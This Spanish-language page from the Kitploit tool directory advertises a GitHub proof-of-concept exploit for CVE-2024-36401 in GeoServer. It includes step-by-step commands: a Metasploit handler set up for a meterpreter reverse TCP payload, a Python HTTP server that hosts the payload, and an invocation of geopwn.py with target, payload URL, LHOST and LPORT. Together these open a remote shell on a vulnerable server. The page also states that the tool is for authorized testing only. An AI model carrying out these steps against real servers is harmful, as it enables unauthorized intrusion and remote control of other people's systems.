Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36401-PoC — Exploit de Prueba de Concepto para CVE-2024-36401 GeoServer 2.25.1 | Kitploit
Herramientas/GitHubGitHub/daniellowrie/cve-2024-36401-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubdaniellowrie/cve-2024-36401-poc

CVE-2024-36401-PoC

Exploit de Prueba de Concepto para CVE-2024-36401 GeoServer 2.25.1

Ver Repositorio
33hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-36401-PoC

Exploit de Prueba de Concepto para CVE-2024-36401 GeoServer
Versiones vulnerables de GeoServer son anteriores a 2.23.6 | 2.24.4 | 2.25.2

!!! SOLO CON FINES DE PRUEBAS DE SEGURIDAD !!!
******************************************************
NO USE ESTO EN SISTEMAS QUE NO
POSEAS A MENOS QUE TENGAS PERMISO EXPRESO !!!

Para ejecutar...

  1. Inicie un listener en Metasploit
    • root@kitploit:~
      msf6 > use exploit/multi/handler
      msf6 > exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
      msf6 > exploit(multi/handler) > set LHOST 10.10.10.1 <--(set to your IP)
      msf6 > exploit(multi/handler) > set LPORT 1234 <--(you can leave default, or change to your preference)
      msf6 > exploit(multi/handler) > run
      
      [*] Started reverse TCP handler on 10.10.10.1:1234
      
      
  2. Inicie el servidor HTTP con Python
    • root@kitploit:~
      hacker@kali~> python3 -m http.server
      Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
      
  3. Ejecute el exploit
    • root@kitploit:~
      hacker@kali~> python3 ./geopwn.py <target_domain_or_IP> <payload_URL> <LHOST> <LPORT>
      
Descargar herramienta